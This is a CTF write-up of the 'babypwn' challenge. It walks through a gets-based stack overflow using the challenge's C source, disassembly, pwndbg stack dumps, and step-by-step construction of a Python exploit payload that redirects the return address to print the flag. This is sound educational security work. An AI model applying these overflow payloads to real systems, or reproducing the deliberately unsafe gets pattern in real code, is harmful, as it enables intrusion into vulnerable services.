JohnLyu's blog

Orange Juice Agency, Eorzea Branch

cybersecurityrumble-2020-babypwn

Introduction

Challenge files

Never done any kind of binary exploitation before? This should get you started. Grab some gdb or radare, turn off ASLR, forget about stack canaries, and let the fun begin.

Check the binary's protections:

[*] babypwn'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments

OK, this looks very baby indeed: no ASLR, no canaries, and the source code is even provided.

PIE is enabled, but the server runs with ASLR turned off.

Source code

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <assert.h>
#include <openssl/md5.h>

void calc_string_md5(char *string, char md5[MD5_DIGEST_LENGTH]) {
    MD5_CTX c;
    MD5_Init(&c);
    MD5_Update(&c, string, strlen(string));
    MD5_Final(md5, &c);
}

unsigned char char_to_repr(char in) {
    if (in >= '0' && in <= '9')
        return in - '0';
    if (in >= 'a' && in <= 'f')
        return in - 'a' + 0xa;
    if (in >= 'A' && in <= 'F')
        return in - 'A' + 0xa;
    assert("not in hex digit range" && 0);
}

void hex_to_binary(char *in, unsigned char* out, size_t length) {
    size_t i;
    assert("length must be even" && (length % 2) == 0);

    length /= 2;
    for (i = 0; i < length; i++) {
        out[i] = char_to_repr(in[i * 2]) << 4 | char_to_repr(in[i * 2 + 1]);
    }
}

int check_user_hash(char* flag) {
    unsigned char user_md5[MD5_DIGEST_LENGTH * 2 + 1];
    unsigned char flag_md5[MD5_DIGEST_LENGTH];

    /* calculate MD5("CSR{...}") */
    calc_string_md5(flag, flag_md5);

    /* read user input, convert to hexadecimal */
    gets(user_md5);
    hex_to_binary(user_md5, user_md5, strlen(user_md5));

    return memcmp(flag_md5, user_md5, MD5_DIGEST_LENGTH) ? 0 : 1;
}

int main() {
    char flag[0x500];
    setvbuf(stdin, 0, _IONBF, 0);
    setvbuf(stdout, 0, _IONBF, 0);
    setvbuf(stderr, 0, _IONBF, 0);

    /* read flag */
    int fd = open("flag.txt", O_RDONLY);
    assert("unable to open flag file" && fd >= 0);
    flag[read(fd, flag, sizeof(flag))] = '\0';
    close(fd);

    puts("It's easy. Give me MD5($flag), get $flag in return.");

    /* if md5 is correct, print flag */
    if(check_user_hash(flag)) {
        puts(flag);
    } else {
        puts("nope");
    }

    return 0;
}

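At first glance, gets(user_md5); is an unbounded read into a 33-byte stack buffer, i.e. a stack overflow.

Disassembly

Here is the assembly of check_user_hash: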

000000000000143e
; ================ B E G I N N I N G O F P R O C E D U R E ================

; Variables:
; var_68: int64_t, -104
; var_70: int64_t, -112
; var_78: int64_t, -120
; var_80: int64_t, -128


check_user_hash:
0000000000001440 push r12 ; Begin of unwind block (FDE at 0x220c), CODE XREF=main+145
0000000000001442 mov r12, rdi
0000000000001445 push rbp
0000000000001446 sub rsp, 0x78
000000000000144a lea rbp, qword [rsp+0x80+var_70]
000000000000144f mov rdi, rbp ; argument "c" for method j_MD5_Init
0000000000001452 call j_MD5_Init ; MD5_Init
0000000000001457 mov rdi, r12 ; argument "__s" for method j_strlen
000000000000145a call j_strlen ; strlen
000000000000145f mov rsi, r12 ; argument "data" for method j_MD5_Update
0000000000001462 mov rdi, rbp ; argument "c" for method j_MD5_Update
0000000000001465 mov rdx, rax ; argument "len" for method j_MD5_Update
0000000000001468 call j_MD5_Update ; MD5_Update
000000000000146d mov rsi, rbp ; argument "c" for method j_MD5_Final
0000000000001470 mov rdi, rsp ; argument "md" for method j_MD5_Final
0000000000001473 call j_MD5_Final ; MD5_Final
0000000000001478 mov rdi, rbp ; argument "__str" for method j_gets
000000000000147b call j_gets ; gets
0000000000001480 mov rdi, rbp ; argument "__s" for method j_strlen
0000000000001483 call j_strlen ; strlen
0000000000001488 mov rsi, rbp ; argument #2 for method hex_to_binary
000000000000148b mov rdi, rbp ; argument #1 for method hex_to_binary
000000000000148e mov rdx, rax ; argument #3 for method hex_to_binary
0000000000001491 call hex_to_binary ; hex_to_binary
0000000000001496 mov rdx, qword [rsp+0x80+var_78]
000000000000149b mov rax, qword [rsp+0x80+var_80]
000000000000149f xor rdx, qword [rsp+0x80+var_68]
00000000000014a4 xor rax, qword [rsp+0x80+var_70]
00000000000014a9 or rdx, rax
00000000000014ac sete al
00000000000014af add rsp, 0x78
00000000000014b3 movzx eax, al
00000000000014b6 pop rbp
00000000000014b7 pop r12
00000000000014b9 ret

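Dynamic debugging

The function uses rbp heavily as a general-purpose register, which makes reasoning about the stack statically quite tedious.

So let's switch to gdb and debug it dynamically.

Set a breakpoint at the call to j_gets.

At that point the stack looks roughly like this: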

0x555555555478 <check_user_hash+56> mov rdi, rbp
0x55555555547b <check_user_hash+59> call gets@plt <gets@plt>

0x555555555480 <check_user_hash+64> mov rdi, rbp
0x555555555483 <check_user_hash+67> call strlen@plt <strlen@plt>

0x555555555488 <check_user_hash+72> mov rsi, rbp
0x55555555548b <check_user_hash+75> mov rdi, rbp
0x55555555548e <check_user_hash+78> mov rdx, rax
0x555555555491 <check_user_hash+81> call hex_to_binary <hex_to_binary>

0x555555555496 <check_user_hash+86> mov rdx, qword ptr [rsp + 8]
0x55555555549b <check_user_hash+91> mov rax, qword ptr [rsp]
───────────────────────────────────────[ STACK ]────────────────────────────────────────
00:0000│ rdi rsp 0x7fffffffdcc0 ◂— 0xa /* '\n' */
01:0008│         0x7fffffffdcc8 —▸ 0x5555555580a8 (stdout@@GLIBC_2.2.5) —▸ 0x7ffff7c3b760 (_IO_2_1_stdout_) ◂— xchg dword ptr [rax], ebp /* 0xfbad2887 */
02:0010│ rsi rbp 0x7fffffffdcd0 ◂— 0xefcdab8967452301
03:0018│         0x7fffffffdcd8 ◂— 0x1032547698badcfe
04:0020│         0x7fffffffdce0 ◂— 0xf8
05:0028│         0x7fffffffdce8 ◂— 'CSR{this-is-not-the-real-flag}\n'
06:0030│         0x7fffffffdcf0 ◂— '-is-not-the-real-flag}\n'
07:0038│         0x7fffffffdcf8 ◂— 'the-real-flag}\n'
─────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────
► f 0 555555555473 check_user_hash+51
f 1 555555555176 main+150
f 2 7ffff7aa309b __libc_start_main+235
────────────────────────────────────────────────────────────────────────────────────────
pwndbg> stack 20
00:0000│ rdi rsp 0x7fffffffdcc0 ◂— 0xa /* '\n' */
01:0008│         0x7fffffffdcc8 —▸ 0x5555555580a8 (stdout@@GLIBC_2.2.5) —▸ 0x7ffff7c3b760 (_IO_2_1_stdout_) ◂— xchg dword ptr [rax], ebp /* 0xfbad2887 */
02:0010│ rsi rbp 0x7fffffffdcd0 ◂— 0xefcdab8967452301
03:0018│         0x7fffffffdcd8 ◂— 0x1032547698badcfe
04:0020│         0x7fffffffdce0 ◂— 0xf8
05:0028│         0x7fffffffdce8 ◂— 'CSR{this-is-not-the-real-flag}\n'
06:0030│         0x7fffffffdcf0 ◂— '-is-not-the-real-flag}\n'
07:0038│         0x7fffffffdcf8 ◂— 'the-real-flag}\n'
08:0040│         0x7fffffffdd00 ◂— 0xa7d67616c662d /* '-flag}\n' */
09:0048│         0x7fffffffdd08 ◂— 0x0
... ↓
0d:0068│         0x7fffffffdd28 ◂— 0x1f
0e:0070│         0x7fffffffdd30 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
0f:0078│         0x7fffffffdd38 ◂— 0x3
10:0080│         0x7fffffffdd40 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
11:0088│         0x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test eax, eax
12:0090│ r12     0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
13:0098│         0x7fffffffdd58 ◂— '-is-not-the-real-flag}\n'

Now step over the call, enter an ordinary MD5 string such as cea404648bf1504a431f48e2d7788d74, and look at the stack again:

00:0000│ rsp     0x7fffffffdcc0 ◂— 0x1be3e93037b0d224
01:0008│         0x7fffffffdcc8 ◂— 0x65eb4ac4ed908384
02:0010│ rax rbp 0x7fffffffdcd0 ◂— 'cea404648bf1504a431f48e2d7788d74'
03:0018│         0x7fffffffdcd8 ◂— '8bf1504a431f48e2d7788d74'
04:0020│         0x7fffffffdce0 ◂— '431f48e2d7788d74'
05:0028│         0x7fffffffdce8 ◂— 'd7788d74'
06:0030│         0x7fffffffdcf0 ◂— 0x0
... ↓
0e:0070│         0x7fffffffdd30 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
0f:0078│         0x7fffffffdd38 ◂— 0x3
10:0080│         0x7fffffffdd40 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
11:0088│         0x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test eax, eax
12:0090│ r12     0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
13:0098│         0x7fffffffdd58 ◂— '-is-not-the-real-flag}\n'

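It is easy to see that our input is written starting at the address currently held in rbp (0x7fffffffdcd0). From that we can compute the offset needed to reach the saved return address:

0x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test   eax, eax

That offset is 0x7fffffffdd48 - 0x7fffffffdcd0 = 0x78 bytes.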
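The subtraction can be cross-checked against the prologue in the disassembly. The snippet below is only a sketch: the constants are copied from the pwndbg dump and the Hopper listing above, and the variable names are mine.

```python
# Addresses copied from the local pwndbg session (ASLR off).
BUF_START = 0x7fffffffdcd0  # rbp at the gets call: first byte of our input
RET_SLOT = 0x7fffffffdd48   # stack slot holding the return address (main+150)
RSP_AT_GETS = 0x7fffffffdcc0

# Way 1: subtract the two addresses seen in the debugger.
offset_dynamic = RET_SLOT - BUF_START

# Way 2: rebuild the frame from the prologue
#   push r12; push rbp; sub rsp, 0x78; lea rbp, [rsp+0x80+var_70]
# var_70 is -112, so the buffer sits at rsp + 0x80 - 112 = rsp + 0x10.
buf_from_rsp = 0x80 - 112
ret_from_rsp = 0x78 + 8 + 8  # locals, saved rbp, saved r12
offset_static = ret_from_rsp - buf_from_rsp

print(hex(offset_dynamic), hex(offset_static))
```

Both routes give the same number, which is reassuring given how confusing the rbp usage is in the static listing.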

Analysis

The next step is to decide where to return to.

Look at the assembly of main:

                     loc_1193:
0000000000001193 mov rdi, r12 ; argument "__s" for method j_puts, CODE XREF=main+152
0000000000001196 call j_puts ; puts
000000000000119b jmp loc_1186

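This block is the branch that prints the flag on success.

Because PIE is enabled, the addresses from static analysis cannot be used directly in the exploit. But since ASLR is off, the addresses observed while debugging locally can be used as they are.

So the address to return to is 0x555555555193.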
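The runtime address can be derived rather than eyeballed. As a small sketch, pick one instruction that appears in both the static listing and the pwndbg output, recover the load base from it, and rebase loc_1193. The constant names are mine; the values come from the listings above.

```python
# The same `mov rdi, rbp` before the gets call, seen statically and at runtime.
STATIC_ADDR = 0x1478
RUNTIME_ADDR = 0x555555555478  # check_user_hash+56 in pwndbg

STATIC_PUTS_FLAG = 0x1193  # loc_1193: mov rdi, r12; call puts

load_base = RUNTIME_ADDR - STATIC_ADDR
ret_target = load_base + STATIC_PUTS_FLAG

print(hex(load_base))
print(hex(ret_target))
```

The load base only stays the same from run to run because ASLR is disabled.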

Next, keep single-stepping.

Suppose we build the following payload directly:

from pwn import p64  # pwntools

offset = 0x78
payload = b'a' * offset + p64(0x555555555193)

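It does not print the flag.

The reasons:

  1. hex_to_binary asserts that the length of the input string is even (and char_to_repr asserts that every character is a hex digit, which the address bytes are not).
  2. The pointer that gets printed has also been overwritten with b'aaaaaaaa'.

Problem 1 first: make the first byte of the payload \0, so that strlen returns 0 and the checks pass trivially. gets only stops at a newline, so the rest of the payload is still written to the stack.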
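To see why the leading \0 helps, here is a rough Python model of the checks in the C source above. It is a sketch, not the binary: it assumes the asserts are live in the shipped build (the listing does not show hex_to_binary), and `c_strlen` and `survives_checks` are helper names I made up.

```python
import struct


def c_strlen(buf: bytes) -> int:
    """Length up to the first NUL byte, like C strlen."""
    end = buf.find(b"\0")
    return len(buf) if end == -1 else end


def char_to_repr(ch: int) -> int:
    if ord("0") <= ch <= ord("9"):
        return ch - ord("0")
    if ord("a") <= ch <= ord("f"):
        return ch - ord("a") + 0xA
    if ord("A") <= ch <= ord("F"):
        return ch - ord("A") + 0xA
    raise AssertionError("not in hex digit range")


def hex_to_binary(buf: bytearray, length: int) -> None:
    """In-place conversion, mirroring hex_to_binary(user_md5, user_md5, ...)."""
    if length % 2 != 0:
        raise AssertionError("length must be even")
    for i in range(length // 2):
        buf[i] = char_to_repr(buf[2 * i]) << 4 | char_to_repr(buf[2 * i + 1])


def survives_checks(payload: bytes) -> bool:
    buf = bytearray(payload)
    try:
        hex_to_binary(buf, c_strlen(buf))
    except AssertionError:
        return False
    return True


ret = struct.pack("<Q", 0x555555555193)  # same bytes as pwntools p64
naive = b"a" * 0x78 + ret
nul_first = b"\0" + b"a" * (0x78 - 1) + ret

print(survives_checks(naive))      # False
print(survives_checks(nul_first))  # True
```

With a zero-length string the conversion loop never runs, so none of the filler bytes are inspected at all.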

Now problem 2. Recall the end of check_user_hash from the listing earlier:

00000000000014b7         pop        r12
00000000000014b9 ret

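The last step before ret pops the stack slot just below the return address into r12, and r12 is exactly the argument passed to puts.

The debugger output confirms this.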

10:0080│         0x7fffffffdd40 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
11:0088│         0x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test eax, eax
12:0090│ r12     0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'

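The slot just before the return address holds the pointer to the flag.

So the payload has to preserve this slot. Thanks again to ASLR being off, we do not need any leak to find the address; we simply write the address seen in the local debugger into the payload.

The new payload looks roughly like this: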

offset = 0x70  # distance from the buffer to the saved r12 slot
payload = b'\0' + b'a' * (offset - 1) + p64(0x7fffffffdd50) + p64(0x555555555193)

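Try again: it still fails.

The reason is that gets automatically appends a \0 after the string it stores.

Unfortunately, the stack slot right after the return address is where the flag string itself begins. The \0 therefore overwrites the first character of the flag, and puts prints an empty string.

Fortunately this is a 64-bit program, so the top bytes of an address are already zero (0x7fffffffdd50 and 0x555555555193 each occupy only 6 bytes). In little-endian order the most significant byte sits at the highest memory address, and the string is written from low to high, so if we leave out the last byte of the return address, the \0 appended by gets lands exactly where the address needs a \x00 anyway.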
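A quick check of that byte-order argument, using struct.pack("<Q", ...) from the standard library as a stand-in for pwntools' p64 (the two produce the same 8 little-endian bytes):

```python
import struct

RET_TARGET = 0x555555555193

packed = struct.pack("<Q", RET_TARGET)  # little-endian, 8 bytes
truncated = packed[:-1]                 # what we actually send
in_memory = truncated + b"\0"           # gets appends the terminator

print(packed.hex())
print(struct.unpack("<Q", in_memory)[0] == RET_TARGET)  # True
```

The last two bytes of the packed value are both zero, so dropping one of them and letting gets write it back changes nothing in memory.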

This gives the final payload:

offset = 0x70
payload = b'\0' + b'a' * (offset - 1) + p64(0x7fffffffdd50) + p64(0x555555555193)[:-1]
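To convince myself of the layout without a debugger, the stack can be modelled as a byte array. This is only a toy model under my own assumptions: it covers the region from the input buffer up to the start of the flag, uses the local placeholder flag from the dump, and `simulate_gets` and `qword` are helper names I invented. It compares the final payload with the variant that keeps all eight bytes of the return address.

```python
import struct

BUF = 0x7fffffffdcd0       # start of our input
R12_SLOT = 0x7fffffffdd40  # popped into r12, later passed to puts
RET_SLOT = 0x7fffffffdd48  # return address
FLAG = 0x7fffffffdd50      # flag string in main's frame
TARGET = 0x555555555193    # puts(flag) branch in main
FLAG_TEXT = b"CSR{this-is-not-the-real-flag}\n\0"


def simulate_gets(payload: bytes) -> bytearray:
    """Write payload plus the NUL terminator at BUF, as gets would."""
    mem = bytearray(FLAG - BUF + len(FLAG_TEXT))
    mem[FLAG - BUF:] = FLAG_TEXT
    data = payload + b"\0"
    mem[:len(data)] = data
    return mem


def qword(mem: bytearray, addr: int) -> int:
    return struct.unpack_from("<Q", mem, addr - BUF)[0]


head = b"\0" + b"a" * (0x70 - 1) + struct.pack("<Q", FLAG)
full_ret = head + struct.pack("<Q", TARGET)        # NUL lands on the flag
final = head + struct.pack("<Q", TARGET)[:-1]      # NUL lands inside ret

for name, payload in (("full_ret", full_ret), ("final", final)):
    mem = simulate_gets(payload)
    print(name, hex(qword(mem, R12_SLOT)), hex(qword(mem, RET_SLOT)),
          bytes(mem[FLAG - BUF:FLAG - BUF + 4]))
```

In the model both payloads set r12 and the return address correctly; only the final one leaves the first byte of the flag intact.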

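However, this payload still fails to print the flag on the server, because the server's libc differs from the local one.

That is a minor problem, though: add an offset to each of the two addresses and brute-force it.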
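A rough sketch of how the candidate payloads for such a brute force could be generated. The step size and range below are pure assumptions (the values actually needed on the server are not recorded here), the function names are hypothetical, and the network part is left out on purpose.

```python
import struct
from itertools import product

LOCAL_FLAG_PTR = 0x7fffffffdd50    # stack address from the local debugger
LOCAL_RET_TARGET = 0x555555555193  # code address from the local debugger
OFFSET_TO_R12 = 0x70


def build_payload(flag_ptr: int, ret_target: int) -> bytes:
    """Same layout as the final payload, with adjustable addresses."""
    return (b"\0" + b"a" * (OFFSET_TO_R12 - 1)
            + struct.pack("<Q", flag_ptr)
            + struct.pack("<Q", ret_target)[:-1])


def candidates(stack_deltas, code_deltas):
    """Yield (stack_delta, code_delta, payload) for every combination."""
    for ds, dc in product(stack_deltas, code_deltas):
        payload = build_payload(LOCAL_FLAG_PTR + ds, LOCAL_RET_TARGET + dc)
        if b"\n" in payload:
            continue  # gets stops at a newline, so this one cannot work
        yield ds, dc, payload


# Assumed search space: shift the stack pointer in 0x10 steps, keep the code
# address fixed. Widen either range as needed.
found = list(candidates(range(-0x20, 0x30, 0x10), [0]))
print(len(found))
```

Each candidate would then be sent to the service in turn until the reply contains something that looks like CSR{...}.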